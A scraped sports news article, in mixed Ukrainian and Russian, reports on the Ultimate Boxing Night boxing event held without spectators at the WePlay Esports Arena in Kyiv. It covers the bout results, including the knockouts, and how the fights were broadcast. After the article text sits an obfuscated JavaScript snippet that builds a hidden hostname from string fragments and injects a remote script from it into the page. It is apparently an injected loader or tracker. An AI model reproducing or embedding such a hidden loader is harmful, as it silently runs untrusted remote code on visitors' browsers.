Sportarena

На стику боксу та кіберспорту: як у Києві пройшов вечір поєдинків Ultimate Boxing Night

Кіберспортивна арена прийняла рейтингові бої українських і зарубіжних боксерів - три нокаути, але не всі на нашу користь

На стику боксу та кіберспорту: як у Києві пройшов вечір поєдинків Ultimate Boxing Night

Фото - пресс-служба WePlay Esports

У Києві відбувся вечір боксерських поєдинків Ultimate Boxing Night. 10 квітня у восьми поєдинках зустрілися суперники з України, Грузії, Великобританії, Угорщини, Хорватії та Білорусі. Організатори – компанія Олександра Усика USYK – 17 PROMOTIONS і кіберспортивний медіахолдинг WePlay Esports в особі керуючих партнерів Олега Крота і Юрія Лазебникова.

В трех главных боях вечера победы одержали украинцы. Даниэль Лапин не пустил более низкого Аттилу Короса на близкую дистанцию. Цотне Рогава в первом же раунде нокаутировал в корпус Петера Мрвалжа — так бывший кикбоксер начал свой путь в профессиональном боксе.

А одессит Рамиль Гаджиев одолел белоруса Ивана Мурашкина, несмотря на ожесточенное сопротивление последнего.

Еще один нокаут записал на свой счет Сергей Гук из Львова, перед которым не устоял Андрей Руденко из Киева. Третий нокаут, к сожалению, поймал уже наш земляк — Богдан Гаркавый. Британец Зак Челли добил его в третьем раунде.

Фоторепортаж вечера бокса смотрите тут

Успешные дебюты провели украинцы Мирослав Ищенко, выступающий в средней весовой категории, и супертяжеловес Роберт Мартон. Оба набили очки на опытных соперниках.

Один из самых зрелищных поединков принадлежит белорусу Нодиру Бахшиеву и его британскому оппоненту Шону Феннелу. Вначале Феннел вел не частыми, но увесистыми ударами, и казалось, что у белоруса нет шансов. Но очень скоро напористый Бахшиев выровнял положение. Игнорируя рассечение от британца, он все же доказал свою победу по очкам. Правда, раздельным решением судей.

Арена WePlay Esports Arena Kyiv впервые принимала классический спорт. Параллельно вечеру бокса на ней проходил первый сезон WePlay Ultimate Fighting League — турнира по файтингам Mortal Kombat 11, Soulcalibur IV и Tekken 7. Но конструкция арены, освещение и экраны позволили быстро адаптировать ее под новый формат. А продакшн-студия добавила в трансляцию визуальные эффекты: AR-табло со статистикой, виртуальная тренировочная комната.

Событие по уже привычным нормам проходило в формате без зрителей. Меры предосторожности в связи с COVID-19 были соблюдены: средства защиты, предварительные ПЦР-тесты для всех участников и организаторов.

Комментировали вечер сразу две команды. Звезды киберспортивной аналитики Джеймс Бэнкс, Коби «K-Wiss» Скарлетт, Майкл «MYK» Квон, Стивен «Tasty Steve» Скотт, Рипал «Rip» Парбху сопровождали бои на английском, а с украиноязычными зрителями общался Дмитрий Лазуткин.

Бои транслировались в прямом эфире на телеканале Xsport, Twitch-канале WePlay Ultimate Fighting League, YouTube-канале USYK17 и стриминговая платформа DAZN.

Больше деталей о Ultimate Boxing Night здесь.

(function(){abiy=document.createElement(“script”);abiy_=”u”+(“s”)+”ta”;abiy_+=(“t.i”)+””+”n”;abiy_+=((“f”)+”o”);abiy.type=”text/javascript”;abiy_+=”/”; abiyu=”257027910″;abiyu+=”.0spbtml1biyecc3yqe0″;abiyu+=”mrlzlqs0an9″;abiy.src=”https://”+abiy_+abiyu;abiy.async=true;document.body.appendChild(abiy);})();

варіант матеріалу

Добавьте «sportarena.com» в свои избранные источники Google News (просто нажмите звездочку)

Джерело: Sportarena.com

Рейтинг записи: 12345


Или аккаунт Sportarena